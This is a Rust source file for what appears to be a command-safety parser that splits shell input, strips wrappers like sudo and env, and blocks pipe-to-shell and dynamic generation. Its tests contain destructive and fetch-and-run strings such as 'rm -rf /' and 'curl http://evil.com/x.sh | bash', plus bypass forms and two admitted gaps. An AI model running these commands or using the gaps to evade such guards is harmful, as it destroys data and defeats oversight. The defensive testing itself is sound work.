use crate::rules::CommandInvocation;
const MAX_DEPTH: u8 = 5;
const MAX_INPUT_BYTES: usize = 1_048_576; const MAX_TOKENS: usize = 1_000;
const MAX_SEGMENTS: usize = 20;
const SHELL_NAMES: &[&str] = &["bash", "sh", "zsh", "dash", "ksh"];
#[derive(Debug, PartialEq, Eq)]
pub enum ParseResult {
Commands(Vec<CommandInvocation>),
Block(BlockReason),
}
#[derive(Debug, PartialEq, Eq)]
pub enum BlockReason {
InputTooLarge,
TooManyTokens,
TooManySegments,
DepthExceeded,
ParseError,
DynamicGeneration,
PipeToShell,
}
impl BlockReason {
pub fn message(&self) -> &'static str {
match self {
Self::InputTooLarge => "input exceeds size limit",
Self::TooManyTokens => "too many tokens",
Self::TooManySegments => "too many command segments",
Self::DepthExceeded => "excessive nesting depth",
Self::ParseError => "unparseable command",
Self::DynamicGeneration => "dynamic command generation in shell launcher",
Self::PipeToShell => "pipe to shell interpreter",
}
}
}
pub fn parse_command_string(input: &str) -> ParseResult {
if input.len() > MAX_INPUT_BYTES {
return ParseResult::Block(BlockReason::InputTooLarge);
}
parse_at_depth(input, 0)
}
pub(crate) fn parse_at_depth(input: &str, depth: u8) -> ParseResult {
if depth > MAX_DEPTH {
return ParseResult::Block(BlockReason::DepthExceeded);
}
let normalized = normalize_compound_operators(input);
let tokens = match shell_words::split(&normalized) {
Ok(t) => t,
Err(_) => return ParseResult::Block(BlockReason::ParseError),
};
if tokens.len() > MAX_TOKENS {
return ParseResult::Block(BlockReason::TooManyTokens);
}
if tokens.is_empty() {
return ParseResult::Commands(vec![]);
}
let segments = split_on_operators(&tokens);
if segments.len() > MAX_SEGMENTS {
return ParseResult::Block(BlockReason::TooManySegments);
}
let mut commands = Vec::new();
for (i, segment) in segments.iter().enumerate() {
if segment.is_empty() {
continue;
}
if i > 0 && is_bare_shell(segment) {
return ParseResult::Block(BlockReason::PipeToShell);
}
match process_segment(segment, depth) {
ParseResult::Commands(mut cmds) => commands.append(&mut cmds),
block @ ParseResult::Block(_) => return block,
}
}
ParseResult::Commands(commands)
}
fn process_segment(tokens: &[String], depth: u8) -> ParseResult {
let tokens = unwrap_transparent(tokens);
if tokens.is_empty() {
return ParseResult::Commands(vec![]);
}
if tokens.len() >= 2 {
let base = basename(&tokens[0]);
if SHELL_NAMES.contains(&base) && tokens[1..].iter().any(|t| t.starts_with("<(")) {
return ParseResult::Block(BlockReason::PipeToShell);
}
}
if let Some(inner) = extract_shell_inner(&tokens) {
if contains_dynamic_generation(&inner) {
return ParseResult::Block(BlockReason::DynamicGeneration);
}
return parse_at_depth(&inner, depth + 1);
}
let program = basename(&tokens[0]).to_string();
let args = tokens[1..].to_vec();
ParseResult::Commands(vec![CommandInvocation::new(program, args)])
}
pub(crate) fn normalize_compound_operators(input: &str) -> String {
let mut result = String::with_capacity(input.len() + 32);
let bytes = input.as_bytes();
let len = bytes.len();
let mut i = 0;
let mut in_single = false;
let mut in_double = false;
while i < len {
let b = bytes[i];
if b == b'\'' && !in_double {
in_single = !in_single;
result.push(b as char);
i += 1;
continue;
}
if b == b'"' && !in_single {
in_double = !in_double;
result.push(b as char);
i += 1;
continue;
}
if b == b'\\' && !in_single && i + 1 < len {
result.push(b as char);
result.push(bytes[i + 1] as char);
i += 2;
continue;
}
if !in_single && !in_double {
if b == b'&' && i + 1 < len && bytes[i + 1] == b'&' {
result.push_str(" && ");
i += 2;
continue;
}
if b == b'&' {
if i + 1 < len && bytes[i + 1] == b'>' {
result.push(b as char);
i += 1;
continue;
}
if i > 0 && bytes[i - 1] == b'>' {
result.push(b as char);
i += 1;
continue;
}
result.push_str(" & ");
i += 1;
continue;
}
if b == b'|' && i + 1 < len && bytes[i + 1] == b'|' {
result.push_str(" || ");
i += 2;
continue;
}
if b == b';' {
result.push_str(" ; ");
i += 1;
continue;
}
if b == b'|' {
result.push_str(" | ");
i += 1;
continue;
}
if b == b'\n' || b == b'\r' {
result.push_str(" ; ");
if b == b'\r' && i + 1 < len && bytes[i + 1] == b'\n' {
i += 2;
} else {
i += 1;
}
continue;
}
}
result.push(b as char);
i += 1;
}
result
}
fn split_on_operators(tokens: &[String]) -> Vec<Vec<String>> {
let mut segments: Vec<Vec<String>> = vec![vec![]];
for token in tokens {
match token.as_str() {
"&" | "&&" | "||" | ";" | "|" => {
segments.push(vec![]);
}
_ => {
if let Some(last) = segments.last_mut() {
last.push(token.clone());
}
}
}
}
segments
}
fn unwrap_transparent(tokens: &[String]) -> Vec<String> {
let mut pos = 0;
let len = tokens.len();
while pos < len {
let base = basename(&tokens[pos]);
match base {
"sudo" => {
pos += 1;
while pos < len && tokens[pos].starts_with('-') {
if tokens[pos] == "-u" || tokens[pos] == "-g" {
pos += 1; if pos < len {
pos += 1; }
} else {
pos += 1;
}
}
}
"env" => {
pos += 1;
pos = skip_env_args(tokens, pos);
}
"timeout" => {
pos += 1;
while pos < len && tokens[pos].starts_with('-') {
pos += 1;
}
if pos < len {
pos += 1;
}
}
"nice" => {
pos += 1;
if pos < len && tokens[pos] == "-n" {
pos += 1; if pos < len {
pos += 1; }
} else if pos < len && tokens[pos].starts_with("-n") {
pos += 1; }
}
"nohup" | "command" | "exec" => {
pos += 1;
}
_ => break,
}
}
let pos = pos.min(len);
tokens[pos..].to_vec()
}
fn skip_env_args(tokens: &[String], start: usize) -> usize {
let mut pos = start;
let len = tokens.len();
while pos < len {
let t = &tokens[pos];
if t == "--" {
return pos + 1;
}
if t == "-i" || t == "-0" || t == "-v" {
pos += 1;
continue;
}
if t == "-u" {
pos += 2; continue;
}
if t == "-S" {
pos += 2;
continue;
}
if t.starts_with("-u") && t.len() > 2 {
pos += 1;
continue;
}
if is_env_assignment(t) {
pos += 1;
continue;
}
if t.starts_with('-') {
pos += 1;
continue;
}
break;
}
pos
}
pub(crate) fn is_env_assignment(token: &str) -> bool {
let bytes = token.as_bytes();
if bytes.is_empty() || bytes[0] == b'=' {
return false;
}
if !bytes[0].is_ascii_alphabetic() && bytes[0] != b'_' {
return false;
}
for (i, &b) in bytes.iter().enumerate().skip(1) {
if b == b'=' {
return i > 0; }
if !b.is_ascii_alphanumeric() && b != b'_' {
return false;
}
}
false }
fn extract_shell_inner(tokens: &[String]) -> Option<String> {
if tokens.is_empty() {
return None;
}
let base = basename(&tokens[0]);
if !SHELL_NAMES.contains(&base) {
return None;
}
for (i, token) in tokens.iter().enumerate().skip(1) {
if token == "-c" {
return tokens.get(i + 1).cloned();
}
if token.starts_with('-')
&& token.len() >= 3
&& token.ends_with('c')
&& token.bytes().skip(1).all(|b| b.is_ascii_alphabetic())
{
return tokens.get(i + 1).cloned();
}
}
None
}
fn is_bare_shell(tokens: &[String]) -> bool {
if tokens.is_empty() {
return false;
}
let base = basename(&tokens[0]);
SHELL_NAMES.contains(&base)
}
fn contains_dynamic_generation(s: &str) -> bool {
s.contains("$(") || s.contains('`')
}
fn basename(path: &str) -> &str {
path.rsplit('/').next().unwrap_or(path)
}
#[cfg(test)]
mod tests {
use super::*;
fn cmd(program: &str, args: &[&str]) -> CommandInvocation {
CommandInvocation::new(
program.to_string(),
args.iter().map(|s| s.to_string()).collect(),
)
}
fn assert_commands(input: &str, expected: &[CommandInvocation]) {
match parse_command_string(input) {
ParseResult::Commands(cmds) => assert_eq!(cmds, expected, "input: {input:?}"),
ParseResult::Block(reason) => {
panic!("expected Commands for {input:?}, got Block({:?})", reason)
}
}
}
fn assert_block(input: &str, expected_reason: BlockReason) {
match parse_command_string(input) {
ParseResult::Block(reason) => assert_eq!(reason, expected_reason, "input: {input:?}"),
ParseResult::Commands(cmds) => {
panic!("expected Block for {input:?}, got Commands({cmds:?})")
}
}
}
#[test]
fn simple_command() {
assert_commands("rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn empty_input() {
assert_commands("", &[]);
}
#[test]
fn whitespace_only() {
assert_commands(" ", &[]);
}
#[test]
fn single_command_no_args() {
assert_commands("ls", &[cmd("ls", &[])]);
}
#[test]
fn compound_and() {
assert_commands(
"echo ok && rm -rf /",
&[cmd("echo", &["ok"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn compound_and_no_spaces() {
assert_commands(
"echo ok&&rm -rf /",
&[cmd("echo", &["ok"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn compound_or() {
assert_commands(
"false || rm -rf /",
&[cmd("false", &[]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn compound_semicolon() {
assert_commands(
"echo a; rm -rf /",
&[cmd("echo", &["a"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn compound_semicolon_no_spaces() {
assert_commands(
"echo a;rm -rf /",
&[cmd("echo", &["a"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn compound_mixed() {
assert_commands(
"a && b || c; d",
&[cmd("a", &[]), cmd("b", &[]), cmd("c", &[]), cmd("d", &[])],
);
}
#[test]
fn background_trailing_produces_same_result() {
assert_commands("nohup rm -rf / &", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn background_separates_commands() {
assert_commands(
"echo x & rm -rf /",
&[cmd("echo", &["x"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn background_no_space_separates() {
assert_commands(
"echo x&rm -rf /",
&[cmd("echo", &["x"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn redirect_ampersand_not_split() {
assert_commands(
"echo err &>/dev/null",
&[cmd("echo", &["err", "&>/dev/null"])],
);
}
#[test]
fn redirect_fd_ampersand_not_split() {
assert_commands("ls -la 2>&1", &[cmd("ls", &["-la", "2>&1"])]);
}
#[test]
fn quoted_ampersand_becomes_operator() {
assert_commands("echo '&'", &[cmd("echo", &[])]);
}
#[test]
fn newline_is_command_separator() {
assert_commands(
"echo ok\nrm -rf /",
&[cmd("echo", &["ok"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn crlf_is_command_separator() {
assert_commands(
"echo ok\r\nrm -rf /",
&[cmd("echo", &["ok"]), cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn multiple_newlines() {
assert_commands("a\nb\nc", &[cmd("a", &[]), cmd("b", &[]), cmd("c", &[])]);
}
#[test]
fn newline_inside_single_quotes_preserved() {
assert_commands("echo 'line1\nline2'", &[cmd("echo", &["line1\nline2"])]);
}
#[test]
fn newline_inside_double_quotes_preserved() {
assert_commands("echo \"line1\nline2\"", &[cmd("echo", &["line1\nline2"])]);
}
#[test]
fn line_continuation_not_separator() {
assert_commands("echo hello\\\nworld", &[cmd("echo", &["helloworld"])]);
}
#[test]
fn sudo_stripped() {
assert_commands("sudo rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn sudo_with_user_flag() {
assert_commands("sudo -u root rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn env_with_key_val() {
assert_commands(
"env NODE_ENV=production npm start",
&[cmd("npm", &["start"])],
);
}
#[test]
fn env_multiple_key_vals() {
assert_commands(
"env TERM=xterm LANG=ja sudo rm -rf /",
&[cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn env_with_dash_i() {
assert_commands("env -i rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn env_with_dash_u() {
assert_commands("env -u HOME rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn env_with_double_dash() {
assert_commands("env -- rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn env_bare_becomes_empty() {
assert_commands("env", &[]);
}
#[test]
fn nohup_stripped() {
assert_commands("nohup rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn timeout_stripped() {
assert_commands("timeout 30 rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn nice_stripped() {
assert_commands("nice -n 10 make", &[cmd("make", &[])]);
}
#[test]
fn nice_combined_form() {
assert_commands("nice -n10 make", &[cmd("make", &[])]);
}
#[test]
fn wrappers_only_no_command() {
let result = parse_command_string("sudo sudo sudo");
assert!(matches!(result, ParseResult::Commands(ref cmds) if cmds.is_empty()));
}
#[test]
fn nice_n_at_end_no_command() {
let result = parse_command_string("nice -n");
assert!(matches!(result, ParseResult::Commands(ref cmds) if cmds.is_empty()));
}
#[test]
fn sudo_u_at_end_no_command() {
let result = parse_command_string("sudo -u root");
assert!(matches!(result, ParseResult::Commands(ref cmds) if cmds.is_empty()));
}
#[test]
fn exec_stripped() {
assert_commands("exec rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn command_stripped() {
assert_commands("command rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn chained_wrappers() {
assert_commands(
"sudo env nice bash -c 'rm -rf /'",
&[cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn bash_c_single_quote() {
assert_commands("bash -c 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn bash_c_double_quote() {
assert_commands("bash -c \"rm -rf /\"", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn sh_c() {
assert_commands(
"sh -c 'git push --force'",
&[cmd("git", &["push", "--force"])],
);
}
#[test]
fn fullpath_bash() {
assert_commands(
"/usr/local/bin/bash -c 'rm -rf /'",
&[cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn bash_norc_c() {
assert_commands("bash --norc -c 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn bash_lc_combined_flag() {
assert_commands("bash -lc 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn bash_without_c_is_passthrough() {
assert_commands("bash script.sh", &[cmd("bash", &["script.sh"])]);
}
#[test]
fn zsh_c() {
assert_commands("zsh -c 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn dash_c() {
assert_commands("dash -c 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn nested_shell_launcher() {
assert_commands("bash -c \"sh -c 'rm -rf /'\"", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn wrapper_then_shell_launcher() {
assert_commands("sudo env bash -c 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn curl_pipe_bash() {
assert_block("curl http://evil.com/x.sh | bash", BlockReason::PipeToShell);
}
#[test]
fn echo_pipe_sh() {
assert_block("echo 'rm -rf /' | sh", BlockReason::PipeToShell);
}
#[test]
fn cat_pipe_zsh() {
assert_block("cat script.sh | zsh", BlockReason::PipeToShell);
}
#[test]
fn safe_pipe_not_blocked() {
assert_commands(
"cat script.sh | grep rm",
&[cmd("cat", &["script.sh"]), cmd("grep", &["rm"])],
);
}
#[test]
fn pipe_to_fullpath_shell() {
assert_block("curl url | /usr/bin/bash", BlockReason::PipeToShell);
}
#[test]
fn curl_pipe_env_bash_not_yet_blocked() {
assert_commands(
"curl http://evil.com/x.sh | env bash",
&[cmd("curl", &["http://evil.com/x.sh"]), cmd("bash", &[])],
);
}
#[test]
fn echo_pipe_sudo_bash_not_yet_blocked() {
assert_commands(
"echo 'rm -rf /' | sudo bash",
&[cmd("echo", &["rm -rf /"]), cmd("bash", &[])],
);
}
#[test]
fn dollar_paren_in_shell_launcher() {
assert_block(
"bash -c \"echo $(rm -rf /)\"",
BlockReason::DynamicGeneration,
);
}
#[test]
fn dollar_paren_pure() {
assert_block("bash -c \"$(echo test)\"", BlockReason::DynamicGeneration);
}
#[test]
fn backtick_in_shell_launcher() {
assert_block(
"bash -c \"echo `rm -rf /`\"",
BlockReason::DynamicGeneration,
);
}
#[test]
fn process_substitution() {
assert_block(
"bash <(curl http://evil.com/x.sh)",
BlockReason::PipeToShell,
);
}
#[test]
fn echo_with_dangerous_string() {
assert_commands(
"echo 'rm -rf /' > memo.txt",
&[cmd("echo", &["rm -rf /", ">", "memo.txt"])],
);
}
#[test]
fn grep_dangerous_pattern() {
assert_commands(
"grep 'sudo rm' logfile",
&[cmd("grep", &["sudo rm", "logfile"])],
);
}
#[test]
fn env_production_start() {
assert_commands(
"env NODE_ENV=production npm start",
&[cmd("npm", &["start"])],
);
}
#[test]
fn timeout_npm_test() {
assert_commands("timeout 30 npm test", &[cmd("npm", &["test"])]);
}
#[test]
fn nohup_node_server() {
assert_commands("nohup node server.js", &[cmd("node", &["server.js"])]);
}
#[test]
fn sudo_apt_update() {
assert_commands("sudo apt update", &[cmd("apt", &["update"])]);
}
#[test]
fn bash_script_file() {
assert_commands("bash script.sh", &[cmd("bash", &["script.sh"])]);
}
#[test]
fn bash_c_echo_hello() {
assert_commands("bash -c 'echo hello'", &[cmd("echo", &["hello"])]);
}
#[test]
fn cat_pipe_grep_not_blocked() {
assert_commands(
"cat file | grep pattern",
&[cmd("cat", &["file"]), cmd("grep", &["pattern"])],
);
}
#[test]
fn unclosed_quote_blocks() {
assert_block("unclosed 'quote", BlockReason::ParseError);
}
#[test]
fn depth_limit_respected() {
let result = parse_at_depth("rm -rf /", MAX_DEPTH + 1);
assert_eq!(result, ParseResult::Block(BlockReason::DepthExceeded));
}
#[test]
fn depth_at_max_still_works() {
let result = parse_at_depth("rm -rf /", MAX_DEPTH);
assert_eq!(
result,
ParseResult::Commands(vec![cmd("rm", &["-rf", "/"])]),
);
}
#[test]
fn nested_two_levels() {
assert_commands(
"bash -c \"bash -c 'rm -rf /'\"",
&[cmd("rm", &["-rf", "/"])],
);
}
#[test]
fn input_too_large() {
let huge = "a ".repeat(MAX_INPUT_BYTES + 1);
assert_block(&huge, BlockReason::InputTooLarge);
}
#[test]
fn too_many_tokens_blocks() {
let input = (0..1001)
.map(|i| format!("arg{i}"))
.collect::<Vec<_>>()
.join(" ");
assert_block(&input, BlockReason::TooManyTokens);
}
#[test]
fn tokens_at_limit_still_works() {
let input = (0..1000)
.map(|i| format!("a{i}"))
.collect::<Vec<_>>()
.join(" ");
let result = parse_command_string(&input);
assert!(
matches!(result, ParseResult::Commands(_)),
"1000 tokens should parse, got: {result:?}"
);
}
#[test]
fn too_many_segments_blocks() {
let input = (0..21)
.map(|i| format!("cmd{i}"))
.collect::<Vec<_>>()
.join(" && ");
assert_block(&input, BlockReason::TooManySegments);
}
#[test]
fn segments_at_limit_still_works() {
let input = (0..20)
.map(|i| format!("c{i}"))
.collect::<Vec<_>>()
.join(" && ");
let result = parse_command_string(&input);
assert!(
matches!(result, ParseResult::Commands(_)),
"20 segments should parse, got: {result:?}"
);
}
#[test]
fn quote_splitting_bypass_normalized() {
assert_commands(
"om\"\"amori config disable",
&[cmd("omamori", &["config", "disable"])],
);
}
#[test]
fn backslash_in_command_normalized() {
assert_commands("r\\m -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn tab_as_separator() {
assert_commands("bash\t-c\t'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn multiple_spaces() {
assert_commands("bash -c 'rm -rf /'", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn env_s_flag() {
assert_commands("env -S 'KEY=VAL cmd' rm", &[cmd("rm", &[])]);
}
#[test]
fn env_combined_u_flag() {
assert_commands("env -uHOME rm -rf /", &[cmd("rm", &["-rf", "/"])]);
}
#[test]
fn operators_inside_quotes_preserved() {
assert_commands(
"echo 'a && b || c; d | e'",
&[cmd("echo", &["a && b || c; d | e"])],
);
}
#[test]
fn basename_extracts_correctly() {
assert_eq!(basename("/usr/local/bin/bash"), "bash");
assert_eq!(basename("bash"), "bash");
assert_eq!(basename("/bin/sh"), "sh");
}
#[test]
fn is_env_assignment_works() {
assert!(is_env_assignment("KEY=val"));
assert!(is_env_assignment("NODE_ENV=production"));
assert!(is_env_assignment("A="));
assert!(!is_env_assignment("=val"));
assert!(!is_env_assignment(""));
assert!(!is_env_assignment("noeq"));
assert!(!is_env_assignment("1KEY=val"));
}
#[test]
fn normalize_compound_preserves_quoted() {
let result = normalize_compound_operators("echo 'a&&b' && rm");
let tokens = shell_words::split(&result).unwrap();
assert_eq!(tokens, vec!["echo", "a&&b", "&&", "rm"]);
}
}